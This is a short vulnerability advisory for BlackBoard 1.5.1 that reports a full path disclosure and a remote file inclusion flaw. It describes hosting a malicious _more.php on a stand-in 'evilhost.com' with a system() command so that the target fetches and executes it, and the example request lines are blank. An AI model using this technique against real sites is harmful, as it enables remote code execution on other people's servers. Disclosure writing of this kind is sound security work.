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Multiple vulnerabilities in BlackBoard

Multiple vulnerabilities in BlackBoard

*AuThor:Cracklove                *
*HoMePaGe:http://ProxySky.com    *


Website: http://blackboard.unclassified.de
Version: 1.5.1,Maybe prior
Problem: Full path disclosure,Include file


1.Full path disclosure:

Let's try to request like this:


and we get standard error messages like that:

Warning: main(lang/_more.php): failed to open stream: No such file or directory 
in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15

Fatal error: main(): Failed opening required 'lang/_more.php' 
(include_path='.:/usr/local/lib/php') in 
/www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15

The Problem also in admin.inc.php,cp.inc.php etc.

2.Include file

Ok let's open ./bb_lib/admin.inc.php,We see

require($libpath . 'lang/' . $LANG . '_more.php');

Bingo!It is include vul!


For example, if I had access to place files in a webspace 
http://evilhost.com/,I would create a directory "lang" and place
inside it a script called _more.php with content like the following:

system("uname -a;id;ls -al");

If we then make a request to the target machine like the following:


The code should be retrieved and executed.


Maybe a patch will release later.


Greets To Xon,fatb,Envymask,h886,ToToDoDo And to all people in China.